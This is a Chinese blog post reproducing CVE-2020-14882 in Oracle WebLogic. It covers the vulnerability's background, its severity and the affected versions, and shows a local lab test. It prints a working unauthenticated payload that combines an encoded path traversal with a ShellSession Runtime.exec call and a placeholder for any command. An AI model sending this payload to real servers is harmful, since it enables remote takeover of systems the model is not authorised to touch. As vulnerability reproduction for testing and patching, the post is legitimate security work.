cve-2020-14882复现

admin 2020年11月28日11:30:50评论272 views字数 920阅读3分4秒阅读模式

点击蓝字 ·  关注我们

01

简介:

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

02

漏洞概述

在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。

该漏洞能够在无需身份验证的情况下被触发,影响面较大。

未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。

官方给出的CVSS 评分为 9.8。

03

漏洞影响范围

Oracle Weblogic Server 10.3.6.0.0

Oracle Weblogic Server 12.1.3.0.0

Oracle Weblogic Server 12.2.1.3.0

Oracle Weblogic Server 12.2.1.4.0

Oracle Weblogic Server 14.1.1.0.0

04

漏洞复现

我在本地搭建了12.2.1.3.0版本的weblogic 访问http://ip:7001/console


cve-2020-14882复现


环境搭建成功

Payload:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27你想执行的命令%27);%22);


cve-2020-14882复现

回到服务器查看/tmp文件夹下edisec文件已经创建


cve-2020-14882复现


说明命令执行成功

EDI安全

cve-2020-14882复现

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):cve-2020-14882复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年11月28日11:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cve-2020-14882复现http://cn-sec.com/archives/191282.html

发表评论

匿名网友 填写信息